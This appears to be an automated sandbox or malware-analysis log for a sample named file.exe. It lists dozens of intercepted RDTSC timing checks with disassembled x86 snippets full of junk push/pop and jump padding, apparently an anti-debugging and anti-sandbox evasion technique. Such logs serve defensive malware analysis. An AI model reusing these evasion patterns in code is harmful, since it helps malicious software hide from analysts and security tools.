Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 65F3E4 second address: 65F41E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jne 00007F2810745896h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [eax] 0x00000010 jng 00007F28107458B2h 0x00000016 pushad 0x00000017 jl 00007F2810745896h 0x0000001d jmp 00007F28107458A4h 0x00000022 popad 0x00000023 mov dword ptr [esp+04h], eax 0x00000027 push edi 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 65F5B7 second address: 65F5BC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 65FBCA second address: 65FC61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnc 00007F2810745896h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007F2810745898h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 00000016h 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 cld 0x0000002a call 00007F28107458A9h 0x0000002f mov dword ptr [ebp+122D1AB6h], edi 0x00000035 pop ecx 0x00000036 push 0000001Eh 0x00000038 push 00000000h 0x0000003a push ecx 0x0000003b call 00007F2810745898h 0x00000040 pop ecx 0x00000041 mov dword ptr [esp+04h], ecx 0x00000045 add dword ptr [esp+04h], 00000019h 0x0000004d inc ecx 0x0000004e push ecx 0x0000004f ret 0x00000050 pop ecx 0x00000051 ret 0x00000052 mov edi, dword ptr [ebp+12459F84h] 0x00000058 nop 0x00000059 ja 00007F28107458A8h 0x0000005f push eax 0x00000060 push eax 0x00000061 push edx 0x00000062 push eax 0x00000063 push edx 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 65FC61 second address: 65FC65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 65FC65 second address: 65FC7D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28107458A4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 65FC7D second address: 65FC87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F2810BC4666h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 65FDCB second address: 65FDD5 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F2810745896h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 65FFED second address: 66000E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F2810BC4675h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 690A7A second address: 690A80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 690BEE second address: 690C26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F2810BC4666h 0x0000000a jmp 00007F2810BC4676h 0x0000000f popad 0x00000010 jnl 00007F2810BC4672h 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6910FB second address: 6910FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 69121A second address: 691222 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 69E312 second address: 69E374 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F2810745896h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push edi 0x0000000e pop edi 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pushad 0x00000013 jnc 00007F2810745896h 0x00000019 jmp 00007F28107458A4h 0x0000001e pushad 0x0000001f popad 0x00000020 popad 0x00000021 ja 00007F28107458A2h 0x00000027 popad 0x00000028 jbe 00007F28107458C4h 0x0000002e jmp 00007F28107458A4h 0x00000033 pushad 0x00000034 push edx 0x00000035 pop edx 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 69CDB3 second address: 69CDB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 69CDB7 second address: 69CDBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 69CDBB second address: 69CDD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jg 00007F2810BC4666h 0x0000000d jl 00007F2810BC4666h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 69CDD1 second address: 69CDEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F28107458A4h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 69CDEB second address: 69CDF9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edi 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 69D242 second address: 69D268 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F28107458A4h 0x00000009 jmp 00007F281074589Eh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 69D268 second address: 69D28A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F2810BC4678h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 69D28A second address: 69D28E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 69D412 second address: 69D42C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F2810BC466Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 69D827 second address: 69D855 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F281074589Ch 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F281074589Eh 0x00000018 jne 00007F2810745896h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 69D855 second address: 69D879 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2810BC466Dh 0x00000007 js 00007F2810BC4666h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 jmp 00007F2810BC466Bh 0x00000015 pop eax 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 69D9DF second address: 69DA09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F281074589Ah 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d jnc 00007F281074589Eh 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push edx 0x00000018 push edx 0x00000019 pop edx 0x0000001a pushad 0x0000001b popad 0x0000001c pop edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 69DD11 second address: 69DD16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6A301F second address: 6A3029 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F2810745896h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6A3029 second address: 6A3045 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2810BC4678h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6A3045 second address: 6A305C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F281074589Ch 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6A305C second address: 6A3061 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6A3061 second address: 6A306E instructions: 0x00000000 rdtsc 0x00000002 jng 00007F2810745898h 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6A306E second address: 6A309B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2810BC4670h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 pop eax 0x00000017 push edi 0x00000018 pop edi 0x00000019 popad 0x0000001a jnc 00007F2810BC4668h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6A5355 second address: 6A535F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F2810745896h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6A8CFC second address: 6A8D21 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F2810BC4666h 0x00000008 jg 00007F2810BC4666h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ecx 0x00000011 jmp 00007F2810BC4670h 0x00000016 pop ecx 0x00000017 push ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6AD60D second address: 6AD637 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F2810745896h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b pushad 0x0000000c jno 00007F2810745898h 0x00000012 jo 00007F2810745898h 0x00000018 push edx 0x00000019 pop edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jnp 00007F2810745896h 0x00000022 jns 00007F2810745896h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6AD637 second address: 6AD641 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F2810BC4666h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6ADBAA second address: 6ADBCB instructions: 0x00000000 rdtsc 0x00000002 jng 00007F2810745896h 0x00000008 js 00007F2810745896h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop ecx 0x00000011 js 00007F28107458D1h 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b jl 00007F2810745896h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6ADBCB second address: 6ADBEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2810BC4677h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6ADBEA second address: 6ADBEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6ADD4E second address: 6ADD69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F2810BC466Bh 0x0000000b popad 0x0000000c pushad 0x0000000d jnc 00007F2810BC4666h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6ADD69 second address: 6ADD72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6ADD72 second address: 6ADD78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6B373F second address: 6B375F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F28107458A3h 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6B375F second address: 6B3782 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007F2810BC4674h 0x0000000b jmp 00007F2810BC466Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 jns 00007F2810BC4666h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6B2D6F second address: 6B2D73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6B2D73 second address: 6B2D7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F2810BC4666h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6B2EEF second address: 6B2EF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6B2EF5 second address: 6B2EF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6B2EF9 second address: 6B2EFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6B2EFD second address: 6B2F03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6B3088 second address: 6B308E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6B308E second address: 6B30A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F2810BC4666h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007F2810BC4666h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6B3226 second address: 6B322B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6B9577 second address: 6B957B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6B9AB3 second address: 6B9AB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6BA02A second address: 6BA02F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6BA02F second address: 6BA034 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6BA034 second address: 6BA03A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6BA33D second address: 6BA342 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6BA8E2 second address: 6BA8F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push edx 0x00000008 ja 00007F2810BC466Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6BA8F2 second address: 6BA8FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6BF6C8 second address: 6BF6D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F2810BC4666h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6BF6D6 second address: 6BF6E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F2810745896h 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6BF6E4 second address: 6BF6F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007F2810BC4666h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6BF6F3 second address: 6BF70B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F281074589Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jns 00007F2810745896h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6BF70B second address: 6BF71E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2810BC466Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6BE97A second address: 6BE980 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6BEB21 second address: 6BEB27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6BEB27 second address: 6BEB49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F2810745896h 0x0000000a popad 0x0000000b push edi 0x0000000c push edx 0x0000000d pop edx 0x0000000e jc 00007F2810745896h 0x00000014 pop edi 0x00000015 pop edi 0x00000016 push eax 0x00000017 push edx 0x00000018 je 00007F281074589Ah 0x0000001e push ebx 0x0000001f pop ebx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6BEF77 second address: 6BEF96 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F2810BC4666h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnc 00007F2810BC466Eh 0x00000010 pushad 0x00000011 popad 0x00000012 jnc 00007F2810BC4666h 0x00000018 pop ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6BEF96 second address: 6BEFA8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F281074589Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6BEFA8 second address: 6BEFBA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jns 00007F2810BC4666h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007F2810BC4666h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6BF3E5 second address: 6BF3E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6BF3E9 second address: 6BF41C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2810BC4678h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push edx 0x0000000f pop edx 0x00000010 jmp 00007F2810BC466Fh 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6C3FCB second address: 6C3FD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6C3FD0 second address: 6C3FDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F2810BC4666h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6C3FDA second address: 6C3FE4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6CD775 second address: 6CD795 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F2810BC4679h 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6CD795 second address: 6CD7A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jl 00007F2810745896h 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6CBAC4 second address: 6CBADA instructions: 0x00000000 rdtsc 0x00000002 jne 00007F2810BC4666h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jg 00007F2810BC4666h 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6CBADA second address: 6CBB11 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F2810745896h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F28107458A4h 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 jmp 00007F28107458A0h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6CBB11 second address: 6CBB1B instructions: 0x00000000 rdtsc 0x00000002 js 00007F2810BC4666h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6CBDB2 second address: 6CBDB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6CBF05 second address: 6CBF0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6CBF0D second address: 6CBF12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6CC369 second address: 6CC387 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2810BC4676h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6CC7AC second address: 6CC7B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6CB49B second address: 6CB4B3 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F2810BC4672h 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F2810BC466Ah 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6D31AB second address: 6D31B2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6D31B2 second address: 6D31BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
